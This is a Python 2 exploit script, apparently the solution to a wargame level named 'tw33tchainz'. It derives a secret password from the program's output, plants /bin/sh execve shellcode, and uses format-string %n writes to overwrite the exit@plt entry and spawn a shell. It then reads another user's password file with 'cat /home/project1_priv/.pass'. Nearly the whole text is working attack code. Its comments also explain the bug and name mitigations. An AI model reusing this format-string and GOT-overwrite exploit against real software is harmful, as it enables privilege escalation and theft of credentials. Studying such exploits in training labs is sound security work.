- import struct
- import sys
- import subprocess
- import binascii
- import array
- import math
- import itertools
- from itertools import dropwhile
- from pwnlib.asm import asm, disasm, context, make_elf
# toolz was not installed, so these two helpers were copied from it
def first(seq):
    """Return the leading element of *seq*.

    Works on any iterable; when *seq* is an iterator exactly one item is
    consumed.  Raises StopIteration if *seq* yields nothing, the same way
    ``next`` does on an exhausted iterator.

    >>> first('ABC')
    'A'
    """
    head_only = itertools.islice(seq, 1)
    return next(head_only)
def second(seq):
    """Return the element that follows the first one in *seq*.

    Works on any iterable; when *seq* is an iterator exactly two items are
    consumed.  Raises StopIteration if fewer than two elements are
    available.

    >>> second('ABC')
    'B'
    """
    it = iter(seq)
    next(it)  # discard the head
    return next(it)
# --- target setup ----------------------------------------------------------
# pwnlib assembler context: 32-bit x86, matching the int 0x80 stub assembled
# further down.
context.clear()
context.arch = 'i386'
context.bits = 32
# Fixed 16-byte inputs written as hex text and expanded to lists of byte
# values.  str.decode('hex') and a list-returning map() are Python 2 only;
# this script does not run unchanged on Python 3.
username = map(ord, 'cccc000acccccccccccccccccccccccc'.decode('hex'))
salt = map(ord, 'baba000ababababababababababababa'.decode('hex'))
# Spawn the level binary with both pipes under our control.  Everything that
# follows is a strict write/read sequence on these two pipes, so statement
# order is part of the behaviour.
p = subprocess.Popen(['/levels/project1/tw33tchainz'],
                     stdout=subprocess.PIPE,
                     stdin=subprocess.PIPE)
# Every write is padded to 4096 bytes of '\n' so each line-reading prompt gets
# an answer; the surplus newlines are consumed as empty answers.
p.stdin.write('\n'.join([
    '\n',
    '\n'
]).ljust(4096, '\n'))
# skip noise: discard output up to and including the line containing
# 'Generated'.  first() raises StopIteration if that line never appears (the
# binary is missing, or its banner changed), which ends the script.
first(dropwhile(lambda line: 'Generated' not in line,
                iter(p.stdout.readline, '')))
generated = p.stdout.readline()
generated = map(ord, generated.strip().decode('hex'))
# Derive the 16-byte value the program expects: per byte,
# (username ^ generated) - salt, reduced to its low 8 bits.  Python's & 0xff
# already yields the two's-complement low byte of a negative result, so the
# + 2**32 term is redundant but harmless.
secret_pass = ''
for i in range(16):
    secret_pass += ("%.2x" % (((username[i] ^ generated[i]) - salt[i] + 2**32) & 0xff))
# Re-pack the 32 hex characters as four little-endian 32-bit words, i.e.
# reverse the byte order inside each 4-byte group, and send them as raw
# bytes rather than as hex text.
s = struct.pack('<I', int(secret_pass[:8], 16)) + \
    struct.pack('<I', int(secret_pass[8:16], 16)) + \
    struct.pack('<I', int(secret_pass[16:24], 16)) + \
    struct.pack('<I', int(secret_pass[24:], 16))
# Menu walk: numeric menu choices interleaved with the input each prompt
# reads.  What choices 3/6/1/2 mean is defined by the binary and is not
# visible here; the program prints an address after the "/bin/sh\x00" entry,
# which the next step parses.
p.stdin.write('\n'.join([
    '3',
    s,
    '\n',
    '6',
    '\n',
    '\n',
    '1',
    "/bin/sh\x00",
    "\n",
    "2",
    "\n",
]).ljust(4096, '\n'))
# Take the last 11 characters of the first line containing 'Address' (trimmed)
# as the hex address text.  This relies on the exact banner layout of the
# target; any change there silently produces a wrong address.
output = dropwhile(lambda line: 'Address' not in line,
                   iter(p.stdout.readline, ''))
address = first(output)[-11:].strip()
# Stage 1 payload: an i386 int 0x80 stub (eax = 0xb, ebx = the address parsed
# above, ecx = edx = 0), assembled with pwnlib one instruction at a time.
# asm() returns a str on Python 2, so += concatenates raw machine code.
instructions = [
    "xor eax, eax",
    "mov ebx, %s" % address,
    "xor ecx, ecx",
    "xor edx, edx",
    "mov al, 0xb",
    "int 0x80"
]
shellcode = ''
for instr in instructions:
    shellcode += asm(instr)
# Store the stub through menu option 1 and read back the address the program
# reports for it (the second 'Address' line this time, parsed as hex).
p.stdin.write('\n'.join([
    "1",
    shellcode,
    "\n",
    "2",
    "\n",
]).ljust(4096, '\n'))
output = dropwhile(lambda line: 'Address' not in line,
                   iter(p.stdout.readline, ''))
shellcode_address = int(second(output)[-11:].strip(), 16)
# exit@plt -- hard-coded for this particular build of the target (no ASLR /
# non-PIE assumed); the three writes below go to base_addr, base_addr+1 and
# base_addr+2.
base_addr = 0x804d03c
first_addr = struct.pack('<I', base_addr)
second_addr = struct.pack('<I', base_addr+1)
third_addr = struct.pack('<I', base_addr+2)
# Format-string write primitive.  Each input is one filler byte, the 4-byte
# target address, a '%<width>x' that pads the printed output, and '%8$n',
# which stores the number of characters printed so far through the 8th
# positional argument.  The width is the wanted value minus the 5 characters
# ("A" plus the address) already printed; offset 8 is the stack position the
# target happens to use and is not derived here.  The first two writes carry
# 8-bit values, the third carries the upper 16 bits.  This primitive exists
# only because the binary passes user input as a printf format string;
# printf("%s", buf) or compiling with -Wformat-security removes it, and
# RELRO would make the GOT/PLT region read-only.
offset = 8
lob = (shellcode_address & 0xff) - 0x5
first_input = "A" + first_addr + "%%%dx" % lob + "%%%i$n" % offset
lob = ((shellcode_address & 0xff00) >> 8) - 0x5
second_input = "A" + second_addr + "%%%dx" % lob + "%%%i$n" % offset
lob = ((shellcode_address & 0xffff0000) >> 16) - 0x5
third_input = "A" + third_addr + "%%%dx" % lob + "%%%i$n" % offset
# Submit the three writes (menu option 1 each time), then choice 5, which is
# presumably the path that uses the overwritten pointer -- not visible here.
p.stdin.write('\n'.join([
    "1",
    first_input,
    "\n",
    "1",
    second_input,
    "\n",
    "1",
    third_input,
    "\n",
    "5",
    "\n"
]).ljust(4096, '\n'))
# If the chain worked, the rest of stdin is presumably read by the spawned
# shell.  communicate() closes stdin and drains stdout until exit; the
# Python 2 print statement then echoes everything the pipe produced.
p.stdin.write('cat /home/project1_priv/.pass\n')
print p.communicate()[0]